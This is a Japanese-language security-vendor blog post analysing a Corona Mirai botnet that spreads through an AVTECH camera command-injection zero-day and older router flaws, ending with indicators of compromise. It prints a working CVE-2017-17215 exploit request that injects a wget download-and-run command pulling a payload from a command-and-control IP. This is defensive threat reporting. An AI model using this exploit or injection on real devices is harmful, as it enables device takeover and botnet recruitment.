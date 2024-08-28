パッチ適用不可に注意：ゼロデイを介して拡散するCorona Miraiボットネット
編集・協力：Tricia Howard
編集・修正：Maria Vlasak
エグゼクティブサマリー
Akamai Security Intelligence and Response Team（SIRT）は、過去に悪用された複数の脆弱性と、SIRTによって検出されたゼロデイ脆弱性を悪用するボットネットキャンペーンを観測しました。
CVE-2024-7029（Aline Eliovichによって発見）は、リモートコードの実行（RCE）を可能にするAVTECH閉回路テレビ（CCTV）カメラの明るさ機能に存在する、コマンドインジェクションの脆弱性です。
コマンドが注入されると、このボットネットは、少なくとも2020年以降に確認されたCOVID-19ウイルスを参照する文字列名をもつMiraiバリアントを拡散します。
この脅威に対する防御を支援するために、このブログ記事に、脅威の痕跡（IOC）のリストを掲載しました。
はじめに
Akamai SIRTは、社内外のさまざまなインテリジェンスフィードを監視し、また、それに参加することで、当社と顧客のオンラインライフの安全を守ります。Akamaiのグローバルなハニーポットネットワークを通じて、いくつかのアクティブな脅威を発見しました。そのうちの1つが、CVE-2024-7029（Aline Eliovichによって発見）です。
このRCEゼロデイ脆弱性は、AVTECHのIPカメラデバイスの明るさ機能で発見されたもので、コマンドインジェクションを可能にし、標的のシステム上にMiraiバリアントを拡散させることができます。これは、昇格した特権（実行中のプロセスオーナー）を使用し、リモートで実行できます。2024年8月、CISAはこの脆弱性について、攻撃の複雑性、リモートエクスプロイト、および既知のパブリックエクスプロイトがないことを理由として、産業用制御システム（ICS）勧告を発行しました。
ボットネットキャンペーンは、CVE-2024-7029以外の複数の脆弱性を標的としており、これには複数のAVTECH脆弱性、Hadoop YARN RCE、CVE-2014-8361、CVE-2017-17215が含まれます。これは、悪性の目的を達成するために、古く、優先度が低そうな、パッチが適用されていない脆弱性を利用するという、攻撃者の厄介な傾向に続くものです。
今こそキャッチアップ&パッチアップのとき
CVE-2024-7029とは？
簡潔に言えば、CVE-2024-7029は、AVTECHのIPカメラデバイスにおいて、「brightness」引数が「action=」パラメーターに存在し、それがコマンドインジェクションを可能にする脆弱性です。この脆弱性は攻撃者によって悪用され、COVID-19ウイルスの名を冠した文字列名を持つMiraiバリアントが拡散されたことが分かりました。
この脆弱性はいつから悪用されているのか
誰が影響を受けるのか
AVTECHのIPカメラデバイスにおけるこの脆弱性は、AVM1203のファームウェアバージョンFullImg-1023-1007-1011-1009までに影響を及ぼします。問題のモデルは数年前に製造中止になっているにもかかわらず、CISAは勧告の中で、これらのデバイスは交通局やその他の重要なインフラエンティティを含め、依然として世界中で使用されていると述べています。
どのような仕組みか
この脆弱性はもともと、ハニーポットログを調べている際に発見されました。図1に、わかりやすくするためにデコードされたURLを示します。
この脆弱性は、/cgi-bin/supervisor/Factory.cgiファイル内の明るさ機能に存在します（図2）。
何が起こり得るのか？
観測された悪用例では、基本的に、この脆弱性が悪用されると、攻撃者による標的システム上でのリモートコード実行に繋がるということが起きていました。
図3は、この脆弱性を悪用することでJavaScriptファイルをダウンロードして実行し、メインのマルウェアペイロードをフェッチしてロードする脅威アクターの例です。他の多くのボットネットと同様に、このボットネットも標的に対してMiraiマルウェアのバリアントを拡散しています。
この例では、ボットネットはCorona Miraiバリアントを使用している可能性が高く、このバリアントはCOVID-19ウイルスとの関連で2020年の時点で他のベンダーによって参照されています。
実行すると、マルウェアはポート23、2323、37215のTelnetを介して多数のホストに接続します。また、感染したホストのコンソールに「Corona」という文字列を出力します（図4）。
マルウェアサンプルにある文字列を静的解析すると、CVE-2017-17215の影響を受けるHuaweiのデバイスを悪用しようとして、/ctrlt/DeviceUpgrade_1というパスを標的にしていることが分かります。このサンプルには、2つのハードコードされたコマンド&コントロール（C2）IPアドレスがあり、そのうちの1つはCVE-2017-17215エクスプロイトコードの一部です（図5）。
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"
<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
図5：CVE-2017-17215 /ctrlt/DeviceUpgrade_1エクスプロイトコード
このボットネットは、Hadoop YARN RCE、CVE-2014-8361、CVE-2017-17215など、他のいくつかの脆弱性も標的にしていました。これらの脆弱性が何度も野放しで悪用されていることが観測されており、現在も悪用され続けています。
結論
正式なCVE割り当てのない脆弱性であっても、組織にとって重大な脅威となる可能性があります。これらのボットネットを運用する攻撃者は、新たな脆弱性や見過ごされている脆弱性を悪用してマルウェアを拡散しています。CVE-2024-7029も見過ごされている脆弱性の一例であり、SIRTが観測している攻撃傾向の中でもますます一般的になりつつあります。
パブリックエクスプロイトや利用可能なPoCが存在しながら正式なCVEが割り当てられていない脆弱性も多く、デバイスにパッチが適用されていないケースもあります。パッチの優先順位を管理することは、特に脅威が利用可能なパッチを持たない場合、困難です。脅威を修復する方法がない場合は、ハードウェアとソフトウェアを廃棄することが、セキュリティリスクを緩和し、規制違反による罰金のリスクを低減するために推奨される方法です。
最新情報をご確認ください
Akamai SIRTは、顧客、社員、そしてセキュリティコミュニティ全体の安全のために、CVE-2024-7029のような脅威の検出、監視、報告を続けていきます。最新の調査結果を把握するには、ソーシャルメディアでフォローするか、当社のセキュリティリサーチのページをご覧ください。
IOC
IPv4アドレス
93.123.39[.]72
93.123.39[.]87
93.123.39[.]111
147.78.103[.]177
185.216.70[.]37
94.156.8[.]185
93.123.39[.]173
74.50.81[.]158
94.156.71[.]74
93.123.85[.]213
185.216.70[.]142
45.66.231[.]148
185.216.70[.]79
SHA256ハッシュ
15a1d52c529d314bb2b5fa8b8bd6c6a496609a283dd0e78e595c929e720d1b5b (“r”)
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